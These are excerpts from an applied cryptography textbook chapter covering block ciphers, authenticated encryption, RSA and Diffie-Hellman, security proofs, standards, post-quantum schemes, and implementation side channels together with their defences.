by the US government in the mid 1970s.
The Advanced Encryption Standard (AES) [1627] is now the most-widely used block cipher. The
AES was the result of a design competition run by the US government agency NIST. It has a
128-bit block (n = 128) and its key-length k is either 128, 192, or 256, precluding exhaustive key
search. Fast implementation of AES is supported by hardware instructions on many Central
Processing Unit (CPU) models. Fast and secure implementation of AES is challenging in
environments where an attacker may share memory resources with the victim, for example
a cache. Still, with its widespread support and lack of known security vulnerabilities, it is
rarely the case that any block cipher other than AES is needed. One exception to this rule is
constrained computing environments.
Except in very limited circumstances, block ciphers should not be used directly for encrypting
data. Rather, they are used in modes of operation [1628]. Modes are discussed further below
under Authenticated Encryption schemes.
ciphertext string C and, in the nonce-based setting, a nonce N . It returns either a plaintext
M or an error message indicating that decryption failed. Correctness of a nonce-based AE
scheme demands that, for all keys K, all plaintexts M and all nonces N , if running Enc on
input (K, M, N ) results in ciphertext C, then running Dec on input (K, C, N ) results in plaintext
M . Informally, correctness means that, for a given key, decryption “undoes” encryption.
18.1.6.1 AE Security
18.1.6.2 Nonces in AE
It is a requirement in the IND-CPA security definition that the nonces used by the adversary
be unique across all calls to its LoR encryption oracle. Such an adversary is called a nonce
respecting adversary. In practice, it is usually the responsibility of the application using an AE
scheme to ensure that this condition is met across all invocations of the Enc algorithm for a
given key K. Note that the nonces do not need to be random. Indeed choosing them randomly
may result in nonce collisions, depending on the quality of the random bit source used, the
size of the nonce space and the number of encryptions performed. For example, the nonces
could be invoked using a stateful counter. The core motivation behind the nonce-based setting
for AE is that it is easier for a cryptographic implementation to maintain state across all
uses of a single key than it is to securely generate the random bits needed to ensure security
in the randomised setting. This is debatable and nonce repetitions have been observed in
practice [1632]. For some AE schemes such as the widely deployed AES-GCM scheme, the
security consequences of accidental nonce repetition are severe, e.g. total loss of integrity
and/or partial loss of confidentiality. For this reason, misuse-resistant AE schemes have
been developed. These are designed to fail more gracefully under nonce repetitions, revealing
less information in this situation than a standard AE scheme might. They are generally more
computationally expensive than standard AE schemes. AES-GCM-SIV [1633] is an example of
such a scheme.
18.1.6.3 AE Variants
Many variants of the basic AE formulation and corresponding security notions have been devel-
oped. As an important example, Authenticated Encryption with Associated Data (AEAD) [1634]
refers to an AE extension in which an additional data field, the Associated Data (AD), is crypto-
graphically bound to the ciphertext and is integrity protected (but not made confidential). This
reflects common use cases. For example, we have a packet header that we wish to integrity
protect but which is needed in the clear to deliver data, and a packet body that we wish to both
integrity protect and make confidential. Even the basic AE security notion can be strengthened
by requiring that ciphertexts be indistinguishable from random bits or by considering security
in the multi-user setting, where the adversary interacts with multiple AE instantiations under
different, random keys and tries to break any one of them. The latter notion is important when
considering large-scale deployments of AE schemes. The two separate notions, IND-CPA and
INT-CTXT, can also be combined into a single notion [1635].
Secure AE (and AEAD) schemes can be constructed generically from simpler encryption
schemes offering only IND-CPA security and SUF-CMA secure MAC schemes. There are three
basic approaches: Encrypt-then-MAC (EtM), Encrypt-and-MAC (E&M) and MAC-then-Encrypt
(MtE). Of these, the security of EtM is the easiest to analyse and provides the most robust
combination, because it runs into fewest problems in implementations. Both MtE and E&M
have been heavily used in widely-deployed secure communications protocols such as SSL/TLS
and Secure Shell (SSH) with occasionally disastrous consequences [1636, 1637, 1638]. Broad
discussions of generic composition can be found in [1639] (in the randomised setting) and
[1640] (more generally).
This generic approach then leaves the question of how to obtain an encryption scheme
offering IND-CPA security. This is easily achieved by using a block cipher in a suitable mode of
operation [1628], for example, counter (CTR) mode or CBC mode. Such a mode takes a block
cipher and turns it into a more general encryption algorithm capable of encrypting messages
of variable length, whereas a block cipher can only encrypt messages of length n bits for some
fixed n. The IND-CPA security of the mode can then be proved based on the assumption that
the used block cipher is a PRP. Indeed, the nonce-based AEAD scheme AES-GCM [1628] can be
seen as resulting from a generic EtM construction applied using AES in a specific nonce-based
version of CTR mode and an SUF-CMA MAC constructed from a universal hash function based
on finite field arithmetic. AES-GCM is currently used in about 90% of all TLS connections on
the web. It has excellent performance on commodity CPUs) from Intel and AMD because of
their hardware support for the AES operations and for the finite field operations required by
the MAC. A second popular AEAD scheme, ChaCha20-Poly1305 [1641], arises in a similar way
from different underlying building blocks. The CAESAR competition7 was a multi-year effort to
produce a portfolio of AEAD schemes for three different use cases: lightweight applications,
high-performance applications and defence in depth (essentially, misuse-resistant AE).
decryption.
There are many flavours of security for PKE. We focus on just one, which is sufficient for many
applications, and provide a brief discussion of some others.
Recall the definition of IND-CPA and IND-CCA security for AE schemes from Section 18.1.6.
Analogous notions can be defined for PKE. In the IND-CPA setting for PKE, we generate a key
pair (sk, pk) by running KeyGen and give the public key pk to an adversary (since public keys
are meant to be public!). The adversary then has access to an LoR encryption oracle which, on
input a pair of equal-length messages (M0 , M1 ), performs encryption of Mb under the public
key pk, i.e. runs the randomised algorithm Enc on input (pk, Mb ), to get a ciphertext C which
is then returned to the adversary. The adversary’s task is to make an estimate of the bit b,
given repeated access to the oracle while, in tandem, performing any other computations it
likes. The adversary is considered successful if, at the end of its attack, it outputs a bit b0 such
that b0 = b. A PKE scheme is said to be IND-CPA secure (“indistinguishability under chosen
plaintext attack”) if no adversary, consuming reasonable resources (quantified in terms of the
computational resources it uses and the number of queries it makes) is able to succeed with
probability significantly greater than 1/2. The intuition behind IND-CPA security for PKE is the
same as that for AE: even with perfect control over which pairs of messages get encrypted,
an adversary cannot tell from the ciphertext which one of the pairs is encrypted each time.
Note that in order to be IND-CPA secure, a PKE scheme must have a randomised encryption
algorithm (if Enc was deterministic, then an adversary that first makes an encryption query on
the pair (M0 , M1 ) with M0 6= M1 and then an encryption query on (M0 , M0 ) could easily break
the IND-CPA notion). If a PKE scheme is IND-CPA secure, then it must be computationally
difficult to recover pk from sk, since, if this were possible, then an adversary could first recover
sk and then decrypt one of the returned ciphertexts C and thereby find the bit b.
IND-CCA security for PKE is defined by extending the IND-CPA notion to also equip the adver-
sary with a decryption oracle. The adversary can submit (almost) arbitrary bit-strings to this
oracle. The oracle responds by running the decryption algorithm and returning the resulting
plaintext or error message to the adversary. To prevent trivial wins for the adversary and
therefore avoid a vacuous security definition, we have to restrict the adversary to not make
decryption oracle queries for any of the outputs obtained from its encryption oracle queries.
We do not generally consider integrity notions for PKE schemes. This is because, given the
public key pk, an adversary can easily create ciphertexts of its own, so no simple concept of
“ciphertext integrity” would make sense for PKE. Integrity in the public key setting, if required,
usually comes from the application of digital signatures, as discussed in Section 18.1.9. Digital
signatures and PKE can be combined in a cryptographic primitive called signcryption. This
can be a useful primitive in some use-cases, e.g. secure messaging (see Section 18.5.2).
In some applications, such as anonymous communications or anonymous cryptocurrencies,
anonymity of PKE plays a role. Roughly speaking, this says that a PKE ciphertext should not
leak anything about the public key pk that was used to create it. This is an orthogonal property
to IND-CPA/IND-CCA security. A related concept is robustness for PKE, which informally says
that a ciphertext generated under one public key pk should not decrypt correctly under the
private key sk 0 corresponding to a second public key pk 0 . Such a property, and stronger variants
of it, are needed to ensure that trial decryption of anonymous ciphertexts does not produce
unexpected results [1642].
A Key Encapsulation Mechanism (KEM) is a cryptographic scheme that simplifies the design
and use of PKE. Whereas a PKE scheme can encrypt arbitrary messages, a KEM is limited to
encrypting symmetric keys. One can then build a PKE scheme from a KEM and an AE scheme
(called a Data Encapsulation Mechanism, DEM, in this context): first use the KEM to encrypt a
symmetric key K, then use K in the AE scheme to encrypt the desired message; ciphertexts
now consist of two components: the encrypted key and the encrypted message.
We can define IND-CPA and IND-CCA security notions for KEMs. These are simpler to work with
than the corresponding notions for PKE and this simplifies security analysis (i.e. generating
and checking formal proofs). Moreover, there is a composition theorem for KEMs which says
that if one takes an IND-CCA secure KEM and combines it with an AE-secure DEM (AE scheme)
as above, then one gets an IND-CCA secure PKE scheme. As well as simplifying design and
analysis, this KEM-DEM or hybrid viewpoint on PKE reflects how PKE is used in practice.
Because PKE has generally slow algorithms and has large ciphertext overhead (compared to
symmetric alternatives like AE), we do not use it directly to encrypt messages. Instead, we use
a KEM to encrypt a short symmetric key and then use that key to encrypt our bulk messages.
Perhaps the most famous PKE scheme is the RSA scheme. In its textbook form, the public
key consists of a pair (e, N ) where N is a product p · q of two large primes and the private
key consists of a value d such that de = 1 mod (p − 1)(q − 1). Encryption of a message M ,
seen as a large integer modulo N , sets C = M e mod N . On account of the mathematical
relationship between d and e, it can be shown that then M = C d mod N . So encryption is done
by “raising to the power of e mod N " and decryption is done by “raising to the power of d mod
N ". These operations can be carried out efficiently using the square-and-multiply algorithm
and its variants. Decryption can be accelerated by working separately modulo p and q and
then combining the results using the Chinese Remainder Theorem (CRT).
The security of RSA, informally, depends on the hardness of the Integer Factorisation Problem
(IFP): if an adversary can recover p and q from N , then it can recompute d from e, p and q
using the extended Euclidean algorithm. But what we really want is a converse result: if an
adversary can break RSA, then it should be possible to use that adversary in a black-box
manner as a subroutine to create an algorithm that factors the modulus N or solves some
other presumed-to-be-hard problem.
This textbook version of RSA is completely insecure and must not be used in practice. Notice,
for example, that it is not randomised, so it certainly cannot be IND-CPA secure. Instead RSA
must be used as the basis for constructing more secure alternatives. This is usually done by
performing a keyless encoding step, represented as a function µ(·), on the message before
applying the RSA transform. Thus we have C = µ(M )e mod N . Decryption then involves
applying the reverse transform and decoding.
In order to achieve modern security notions, µ(·) must be randomised. One popular encoding
scheme, called PKCS#1 v1.5 and specified in [1643], became very common in applications due
to its relatively early standardisation and its ease of implementation. Unfortunately, RSA with
PKCS#1 v1.5 encoding does not achieve IND-CCA security, as demonstrated by the famous
Bleichenbacher attack [1644]. Despite now being more than 20 years old, variants of the
Bleichenbacher attack still regularly affect cryptographic deployments, see for example [1645].
A better encoding scheme is provided in PKCS#1 v2.1 (also specified in [1643]), but it has not
fully displaced the earlier variant. RSA with PKCS#1 v2.1 encoding — also called RSA-OAEP
— can be proven to yield an IND-CCA secure PKE scheme but the best security proof we
have [1646] is unsatisfactory in various technical respects: its proof is not tight and requires
making a strong assumption about the hardness of a certain computational problem. Improved
variants with better security analyses do exist in the literature but have not found their way
into use.
One can easily build an IND-CCA secure KEM from the RSA primitive, as follows: select M at
random from {0, 1, . . . , N − 1}, set C = M e mod N (as in textbook RSA) and define K = H(M )
to be the encrypted symmetric key. Here H is a cryptographic hash function (e.g. SHA-256).
This scheme can be proven secure by modelling H as a random oracle, under the assumption
that the RSA inversion problem is hard. The RSA inversion problem is, informally, given e, M
and M e mod N for a random M , to recover M . The RSA inversion problem is not harder than
the IFP, since any algorithm to solve IFP can be used to construct an algorithm that solves the
RSA inversion problem. But the RSA inversion problem could be easier than the IFP and it is
an open problem to fully decide this question.
Note that RSA encryption is gradually being displaced in applications by schemes using Elliptic
Curve Cryptography (ECC) because of its superior performance and smaller key-sizes for a
given target security level. See Section 18.1.13 for further discussion.
We will discuss another class of PKE schemes, based on the Discrete Logarithm Problem
(DLP) after discussing Diffie-Hellman Key Exchange.
order q. By choosing q and p of an appropriate size, we can make the DLP, and presumably the
CDHP, hard enough to attain a desired security level (see further discussion in Section 18.1.13).
An alternative that has largely now displaced this traditional “finite field Diffie-Hellman” setting
in applications is to use as G the group of points on an elliptic curve over a finite field. This
allows more efficient implementation and smaller key sizes at high security levels, but comes
with additional implementation pitfalls.
The raw DHKE protocol as described directly above is rarely used in practice, because it
is vulnerable to active Man-in-the-Middle (MitM) attacks, in which the adversary replaces
the values g x and g y exchanged in the protocol with values for which it knows the discrete
logarithms. However, the core idea of doing “multiplication in the exponent” is used repeatedly
in cryptographic protocols. MitM attacks are generally prevented by adding some form of
authentication (via MACs or digital signatures) to the protocol. This leads to the notion of
Authenticated Key Exchange (AKE) protocols — see [1648] for a comprehensive treatment.
It is important also for Alice and Bob to use trusted parameters, or to verify the cryptographic
strength of the parameters that they receive, in DHKE. This can be a complex undertaking
even in the traditional setting, since a robust primality test is needed [1649, 1650]. In the
elliptic curve setting, it is not reasonable to expect the verification to be done by protocol
participants and we use one of a small number of standardised curves. It is also important
for the respective parties to check that the received values g y and g x do lie in the expected
group, otherwise the protocol may be subject to attacks such as the small sub-group attack.
These checks may be computationally costly.
It is easy to build a KEM from the DHKE primitive. We simply set the KeyGen algorithm to
output a key pair (sk, pk) = (y, g y ) (where y is generated as in DHKE), while Encrypt selects x
as in DHKE and then simply outputs the group element g x as the ciphertext. Finally, Decrypt
takes as input a group element h and outputs KDF(hy ) where KDF(·) denotes a suitable key
derivation function (as covered in Section 18.3.2). So the symmetric key encapsulated by
group element g x is KDF(g xy ).
From this KEM, using the standard KEM-DEM construction, we obtain a variant of the ElGamal
encryption scheme [1651] called the Diffie-Hellman Integrated Encryption Scheme (DHIES)
and analysed in [1652]. In the elliptic curve setting, the scheme is known as ECIES. It is a
particularly neat PKE scheme with compact ciphertexts and strong security properties. It
avoids many of implementation issues associated with standardised variants of RSA.
Interestingly, signature schemes can be built from symmetric primitives, specifically hash
functions. The original idea goes back to Lamport [1657]: to be able to sign a single bit message,
commit in the verification key to two values h0 = H(M0 ) and h1 = H(M1 ), where M0 encodes
a zero-bit and M1 encodes a one-bit. So the verification key is (h0 , h1 ) and the signing key is
(M0 , M1 ). Now to sign a single bit b, the signer simply outputs Mb ; the verification algorithm
checks the relation hb = H(Mb ), outputting “1” if this holds. The original Lamport scheme
is one-time use only and only signs a single-bit message. But many enhancements have
been made to it over the years bringing it to a practically usable state. A specific hash-based
signature scheme SPHINCS+ is an “alternate candidate” in the NIST PQC process for selecting
post-quantum secure schemes, see Section 18.1.16 for further discussion.
Many forms of signature scheme with advanced security properties have been researched
and sometimes find their way into use, especially in privacy-oriented applications. For ex-
ample, blind signatures [1658] allow a party to obtain signatures on messages without the
signer knowing which message is being signed. Blind signature schemes can be used as a
building block in electronic cash and electronic voting schemes. As a second example, group
signatures allow one of many parties to sign messages in such a way that the verifier cannot
tell exactly which party produced the signature; meanwhile a group manager can “break” this
anonymity property. Group signatures have been used in the Trusted Computing Group’s Direct
Anonymous Attestation protocol [1396] to enable remote authentication of Trusted Platform
Modules whilst preserving privacy. A third example is provided by ring signatures [1659], which
have functionality similar to group signatures but without the opening capability possessed by
a group manager. The cryptocurrency Monero has used ring signatures to provide anonymity.
a “128-bit security level”.8 Such a computational feat seems still well beyond the horizon of even
state security agencies. It’s naturally hard to estimate their capabilities but, for comparison,
the number of hash computations carried out in global Bitcoin mining currently stands at
around 267 per second and has the electricity consumption of a small sovereign state. At that
rate, and assuming the cost of computing a hash is the same as that of testing an AES key,
an exhaustive key search would still require 236 , or about 1011 , years.9 If we are even more
conservative, or want a very large security margin over a long period of time (during which
large-scale quantum computers may become available), or are concerned about concrete
security in the context of multi-target attacks, then aiming for 192-bit or 256-bit security may
be attractive.
We should also be conservative in rejecting algorithms and schemes that have known weak-
nesses, even if seemingly minor. It is a truism that attacks in cryptography only get stronger
with time, either due to computational advances or the introduction of new cryptanalytic
ideas. This conservatism is in tension with the fact that replacing one cryptographic scheme
with another can be costly and time-consuming, unless cryptographic agility is built into our
system (see Section 18.1.14 for further discussion). We are often encumbered with legacy
cryptographic systems that cannot be easily updated, or where the system owners do not see
the value in doing so until a practical break is exhibited.
Notice also that such proofs are not unconditional, unlike most proofs in mathematics. A
typical proof shows that a given scheme or protocol satisfies a particular security definition
under some assumptions. Such proofs are often stated in a reductive fashion (i.e. as with
reductions from complexity theory): given any adversary in the form of an arbitrary algorithm
that can break the scheme according to the security definition, the proof shows that the
adversary A can be used as a subroutine in building an algorithm B that can break one of the
components of the scheme (e.g. find a collision in a hash function) or in building a different
algorithm C that can break some underlying hardness assumption (e.g. solve the IFP for
moduli n with distribution given by the KeyGen algorithm of a PKE scheme). For Applied
Cryptography, concrete reductions are to be preferred. In our example, these are ones in which
in which we eschew statements describing B or C as simply being “polynomial time” but
in which the resources (computation, storage, etc) consumed by the adversary A (and its
advantage in breaking the scheme) are carefully related to those of algorithms B and C.
Furthermore, it is preferable that proofs should be tight. That is, we would like to have proofs
showing a close relationship between the resources consumed by and advantage of adversary
A on the one hand, and the resources consumed by and advantages of algorithms B and
C constructed from A on the other. The result of having a tight proof is that the scheme’s
security can be meaningfully related to that of its underlying components. This is not always
achieved, resulting in proofs that may be technically vacuous.
For complex cryptographic schemes and protocols, the security statements can end up being
difficult to interpret, as they may involve many terms and each term may relate to a different
component in a non-trivial way. Such security statements typically arise from proofs with
many hand-written steps that can hide errors or be difficult for humans to verify. Typically
though, such proofs are modularised in a sequence of steps that can be individually checked
and updated if found to be in error. A popular approach called “game hopping” or “sequences
of games”, as formalised in [1662, 1663] in two slightly different ways, lends itself to the
generation of such proofs. An alternative approach to taming the complexity of proofs comes
from the use of formal and automated analysis methods, see Formal Methods for Security
Knowledge Area (Chapter 13) for an extensive treatment.
The proofs are usually for mathematically tractable pseudo-code descriptions of the schemes,
not for the schemes as implemented in some high-level programming language and certainly
not for schemes as implemented in a machine language. So there is a significant gap in terms
of what artefacts the proofs actually make statements about. Researchers have had some
success in developing tools that can prove the security of running code and some code of this
type has been deployed in practice; for a good overview, see [1664]. Furthermore, a security
proof only gives guarantees concerning the success of attacks that lie within the scope of the
model and says nothing about what happens beyond that. For example, an adversary operating
in the real world may have greater capabilities than are provided to it in the security model
used for proving security. We shall return to these issues in the next section on cryptographic
implementation.
A sustained critique of the provable security approach has been mounted by Koblitz and
Menezes in their “Another look at . . .” series of papers, see [1665] for a retrospective. This
critique has not always been welcomed by the theoretical cryptography research community,
but any serious field should be able to sustain, reflect on and adapt to such critique. In our view,
the work of Koblitz and Menezes has helped to bridge the gap between theory and practice
in cryptography, since it has helped the community to understand and begin to address the
limitations of its formal foundations.
if it has an in-built capability to switch one algorithm for another and/or from one version
to another. This facility is enabled in secure communications protocols like IPsec, SSH and
SSL/TLS through cipher suite and version negotiation: the algorithms that will be used and the
protocol version are negotiated between the participating parties during the protocol execution
itself. Adding this facility to an already complex protocol may introduce security vulnerabilities,
since the negotiation mechanisms themselves may become a point of weakness. An example
of this is downgrade attacks in the context of SSL/TLS, which have exploited the co-existence
of different protocol versions [1667] as well as support for deliberately weakened “EXPORT”
cipher suites [438, 1668]. Cryptographic agility may also induce software bloat as there is an
incipient temptation to add everyone’s favourite algorithm.
At the opposite end of the spectrum from cryptographic agility lies systems (and their de-
signers) that are cryptographically opinionated, that is, where a single set of algorithms is
selected and hard-coded. WireGuard [1669] is an example of such a protocol: it has no facility
to change algorithms and not even a protocol version field.
There is a middle-way: support cryptographic agility where possible, but with tight control over
which algorithms and legacy versions are supported.
For more information on cryptographic agility, especially in the post-quantum setting, we
recommend [1670].
Research Task Force (IRTF) is a sister-organisation to the IETF and its Crypto Forum Research
Group (CFRG)12 acts as a repository of expertise on which the IETF can draw. CFRG also
produces its own RFCs.
Standards bodies are not perfect. Too many bodies — and standards produced by them — can
lead to cryptographic proliferation, which makes inter-operation harder to achieve.They can
also lead to subtle incompatibilities between different versions of the same algorithms. Even
completely open standards bodies may fail to gather input from the right set of stakeholders.
Standards bodies can act prematurely and standardise a version of a scheme that is later
found to be deficient in some way, or where improved options only emerge later. Once the
standard is set, in the absence of serious attacks, there may be little incentive to change it.
The history of PKE schemes based on RSA illustrates this well (see Section 18.1.7.3): RSA with
PKCS#1 v1.5 encoding has led to many security issues and the introduction of attack-specific
work-arounds; RSA with PKCS#1 v2.1 encoding (RSA-OAEP) has been standardised for many
years but has not become widely used; meanwhile even better ways of turning RSA into a
KEM or a PKE have been discovered but have not become mainstream.
Standards bodies are also subject to “regulatory capture”, whereby groups representing
specific national or commercial interests have the potential to influence the work of a standards
body. For example, NSA had a role in the design of the DES algorithm [1671, pp. 232-233], and, on
another occasion, supplied the overall design of the Dual_EC_DBRG pseudorandom generator
that was specified in a NIST standard [1672], along with certain critical parameters [1673, p.
17]. In such contexts, transparency as to the role of any national or commercial stakeholders
is key. For instance, NIST have reviewed their cryptographic standardisation process [1673] to
increase transparency and decrease reliance on external organisations.
Other standards bodies relevant for cryptography include ETSI (which is active in post-quantum
cryptographic standardisation, as discussed immediately below) and IEEE (which developed
an early series of standards for Public Key Cryptography, IEEE P1363).
quantum resistant, or quantum-immune cryptography. PQC has been an active but niche
research field for many years.
In late 2016, in response to projected progress in scaling quantum computing and recognising
the long transition times needed for introducing new cryptographic schemes, NIST launched
a process to define a suite of post-quantum schemes.13 The focus of the NIST process is
on KEMs and digital signature schemes, since the threat quantum computing poses for
symmetric schemes is relatively weaker than it is for public key schemes. At the time of
writing in mid 2021, the process (actually a competition) has entered its third round and a set
of finalist schemes has been selected, alongside a set of alternate, or back-up schemes. The
NIST process should result in new NIST standards in the mid 2020s.
It will be a significant challenge to integrate the new schemes into widely-used protocols and
systems in a standardised way. This is because the NIST finalists have quite different (and
usually worse) performance profiles, in terms of key sizes, ciphertext or signature size and
computation requirements, from existing public key schemes. Work is underway to address
this challenge in IETF and ETSI and some deployment experiments have been carried out for
the TLS protocol by Google and CloudFlare.14 It is likely that post-quantum schemes will initially
be deployed in hybrid modes alongside classical public key algorithms, to mitigate against
immaturity of implementation and security analysis. The recent deployment experiments used
hybrid modes.
It is then important to be clear about what is — and is not — being formally specified and
analysed.
An alternative approach to taming complexity is to use mechanised tools, letting a computer
do the heavy lifting. However, the currently available tools are quite difficult to use and require
human intervention and, more often than not, input from the tool designer. One of the more
successful approaches here is to use a symbolic model of the cryptographic primitives
rather than a computational one as we have been considering so far. This provides a level of
abstraction that enables more complex protocols to be considered, but which misses some
of the subtleties of the computational approach. Symbolic approaches to formal analysis are
covered in more detail in Formal Methods for Security Knowledge Area (Chapter 13).
OpenSSL’s code development is done in this way. As part of its support model, a crypto-
graphic library should have a clear process for notifying its maintainers of bugs and security
vulnerabilities. The library’s developers should commit to address these in a timely manner.
their hacks. An issue here is that the resulting code could be released with the testing
mode still enabled, but one would hope that regular software assurance would detect
this before release.
9. Code that uses the API should be easy to read and maintain. For example, iteration
counts for password hashing should not be set by a developer via the API, but instead
internally in the library. One issue here is that the internal defaults may be overkill and
hurt performance in some use cases. This relates to the tension between flexibility and
security.
10. The API should assist with or handle end user interaction, rather than leave the entire
burden of this to the developer using the API. Here, error messages are highlighted
as a particular concern by Green and Smith: the API and the library documentation
should help developers understand what failure modes the library has, what the security
consequences of these are and how the resulting errors should be handled by the calling
code.
For additional references and discussion, see Human Factors Knowledge Area (Section 4.6.2).
As we noted in Section 18.1.6, the usual security goal of an AEAD scheme does not guarantee
that the length of plaintexts will be hidden. Indeed, AEAD schemes like AES-GCM make it
trivial to read off the plaintext length from the ciphertext length. However, it is clear that length
leakage can be fatal to security. Consider a simplistic secure trading system where a user
issues only two commands, “BUY” or “SELL”, with these commands being encoded in simple
ASCII and sent over a network under the protection of AES-GCM encryption. An adversary
sitting on the network who can intercept the encrypted communications can trivially infer what
commands a user is issuing, just by looking at ciphertext lengths (the ciphertexts for “SELL”
will be one byte longer than those for “BUY”). More generally, attacks based on traffic analysis
and on the analysis of metadata associated with encrypted data can result in significant
information leaking to an adversary.
The amount of time that it takes to execute the cryptographic code may leak information about
the internal processing steps of the algorithm. This may in turn leak sensitive information,
e.g. information about keys. The first public demonstration of this problem was made by
Kocher [1453] with the attacker having direct access to timing information. Later it was shown
that such attacks were even feasible remotely, i.e. could be carried out by an attacker located
at a different network location from the target, with timing information being polluted by
network noise [1679].
Consider for example a naive elliptic curve scalar multiplication routine which is optimised
to ignore leading zeros in the most significant bits of the scalar. Here we imagine the scalar
multiplication performing doubling and adding operations on points, with the operations being
determined by the bits of the scalar from most significant to least significant. If the adversary
can somehow time the execution of the scalar multiplication routine, it can detect cases where
the code finishes early and infer which scalars have some number of most significant bits
equal to zero. Depending on how the routine is used, this may provide enough side channel
information to enable a key to be recovered. This is the case, for example, for the ECDSA
scheme, where even partial leakage of random values can be exploited. Recent systematic
studies in this specific setting [1680, 1681] show that timing attacks are still pertinent today.
Errors arising during cryptographic processing can also leak information about internal pro-
cessing steps. Padding oracle attacks on CBC mode encryption, originally introduced in [1636],
provide a classic and persistent example of this phenomenon. CBC mode uses a block cipher
to encrypt plaintext data that is a multiple of the block cipher’s block length. But in applications,
we typically want to encrypt data of arbitrary length. This implies that data needs to be padded
to a block boundary of the block cipher before it can be encrypted by CBC mode. Vaudenay
observed that, during decryption, this padding needs to be removed, but the padding may be
invalidly formatted and the decryption code may produce an error message in this case. If the
adversary can somehow observe the error message, then it can infer something about the
padding’s validity. By carefully constructing ciphertexts and observing errors arising during
their decryption, an adversary can mount a plaintext recovery attack via this error side channel.
In practice, the error messages may themselves be encrypted, but then revealed via a sec-
ondary side channel, e.g. a timing side channel (since an implementation might abort fur-
ther processing once a padding error is encountered). For examples of this in the con-
text of SSL/TLS and which illustrate the difficulty of removing this class of side channel,
see [1637, 1682].
The cryptographic code may not be running in perfect isolation from potential adversaries.
In particular, in modern CPUs), there is a memory cache hierarchy in which the same fast
memory is shared between different processes, with each process potentially overwriting
portions of the cache used by other processes. For example, in a cloud computing scenario,
many different users’ processes may be running in parallel on the same underlying hardware,
even if they are separated by security techniques like virtualisation. So an attacker, running in
a separate process in the CPU, could selectively flush portions of the cache and then, after
the victim process has run some critical code, observe by timing its own cache accesses,
whether that part of the cache has been accessed by the victim process or not. If the victim
process has a pattern of memory access that is key-dependent, then this may indirectly leak
information about the victim’s key. This particular attack is known as a Flush+Reload attack
and was introduced in [1683]; several other forms of cache-based attack are known. The
possibility of such attacks was first introduced in [1684]; later such attacks were shown to be
problematic for AES in particular [1685].18 In the last few years, researchers have had a field
day developing cache-based and related micro-architectural attacks against cryptographic
implementations. These attacks arise in general from designers of modern CPUs making
architectural compromises in search of speed.
More prosaically, cryptographic keys may be improperly deleted after use, or accidentally
written to backup media. Plaintext may be improperly released to a calling application before
its integrity has been verified. This can occur in certain constructions where MAC verification
is done after decryption and also in streaming applications where only a limited-size buffer is
available for holding decrypted data.
A system making use of multiple cryptographic components may inadvertently leak sensitive
information through incorrect composition of those components. So we have leakage at a
system level rather than directly from the individual cryptographic components. Consider the
case of Zcash,19 an anonymous cryptocurrency. Zcash uses a combination of zero-knowledge
proofs, a PKE scheme and a commitment scheme in its transaction format. The PKE scheme
is used as an outer layer and is anonymous, so the identity of the intended recipient is shielded.
How then should a Zcash client decide if a transaction is intended for it? It has to perform a
trial decryption using its private key; if this fails, no further processing is carried out. Otherwise,
if decryption succeeds, then further cryptographic processing is done (e.g. the commitment
is checked). This creates a potentially observable difference in behaviour that breaks the
intended anonymity properties of Zcash [1686]. The PKE scheme used may be IND-CCA secure
and anonymous, but these atomic security properties do not suffice if the overall system’s
behaviour leaks the critical information.
18
See also https://cr.yp.to/antiforgery/cachetiming-20050414.pdf for contemporaneous but unpublished work.
19
See https://z.cash/.
Hardware implementations may also be vulnerable to fault or glitch attacks, where an error
is introduced into cryptographic computations at a precise moment resulting in leakage of
sensitive data (typically keys) via the output of the computation. The first such attack focused
on implementations of RSA using the CRT [1688]. A more recent incarnation of this form of
attack called Rowhammer targets the induction of faults in memory locations where keys are
stored by repeatedly writing to adjacent locations [989].
18.2.4 Defences
General techniques for defending against cryptographic implementation vulnerabilities (as
opposed to weaknesses in the algorithms and schemes themselves) come from the fields of
software and hardware security and are well-summarised in [1689, 1690]. Indeed, it can be
argued that conventional software security may be more important for cryptographic code
than for other forms of code. For hardware, blinding, masking, threshold techniques and
physical shielding are commonly used protections. For software, common techniques include
formal specification and verification of software and hardware designs, static and dynamic
analysis of code, fuzzing, information flow analysis, the use of domain-specific languages for
generating cryptographic code and the use of strong typing to model and enforce security
properties. Most of the software techniques are currently supported only by experimental
tools and are not at present widely deployed in production environments. Additionally, the
objects they analyse — and therefore the protections they offer — only extend so far, down to
code at Instruction Set Architecture level at best.
Length side channels can be closed by padding plaintexts to one of a set of predetermined
sizes before encryption and by adding cover or dummy traffic. Secure communications
protocols like SSL/TLS and IPsec have features supporting such operations, but these features
are not widely used in practice.
A set of coding practices aim to achieve what is loosely called Constant-Time Cryptography.
The core idea is to remove, through careful programming, any correlation between the values
of sensitive data such as keys or plaintexts, and variables that can be observed by an adversary
such as execution time. This entails avoiding, amongst other things, key-dependent memory
accesses, key-dependent branching and certain low-level instructions whose running time
is operand-dependent. It may also require writing high-level code in particular ways so as to
prevent the compiler from optimising away constant-time protections.20 Writing constant-time
code for existing algorithms is non-trivial. In some cases, cryptographic designers have taken
it into account from the beginning when designing their algorithms. For example, Bernstein’s
ChaCha20 algorithm21 does so, while using certain coordinate systems makes it easier to
achieve constant-time implementation of elliptic curve algorithms [1691].
Pseudo-Random Number Generator, PRNG, using a seed derived from the entropy pool).
Designs of this type are standardised by NIST in [1672]. They are also used in most operating
systems but with a variety of ad hoc and hard-to-analyse constructions. Mature formal security
models and constructions for random bit generators do exist, see [1677] for a survey. But this
is yet another instance where practice initially got ahead of theory, then useful theory was
developed, and now practice is yet to fully catch up again.
It is challenging to estimate how much true randomness can be gathered from the aforemen-
tioned weak entropy sources. In some computing environments, such as embedded systems,
some or all of the sources may be absent, leading to slow filling of the entropy pool after
a reboot — leaving a “boot time entropy hole” [1693, 1694]. A related issue arises in Virtual
Machine (VM) environments, where repeated random bits may arise if they are extracted from
the Operating System too soon after a VM image is reset [1695].
There has been a long-running debate on whether such random bit generators should be
blocking or non-blocking: if the OS keeps a running estimate of how much true entropy remains
in the pool as output is consumed, then should the generator block further output being taken
if the entropy estimate falls below a certain threshold? The short answer is no, if we believe
we are using a cryptographically-secure PRNG to generate the output, provided the entropy
pool is properly initialised with enough entropy after boot. This is because we should trust our
PRNG to do a good job in generating output that is computationally indistinguishable from
random, even if not truly random. Some modern operating systems now offer an interface to
a random bit generator of this “non-blocking-if-properly-seeded” type.
and server in a complex cryptographic protocol, perhaps with one party choosing the session
key and then making use of PKE to transport it to the other party.
Keys may also be derived from other keys using suitable cryptographic algorithms known as
Key Derivation Functions.
Keys need to be stored securely until they are needed. We discuss some of the main key
storage options in more detail in the sequel.
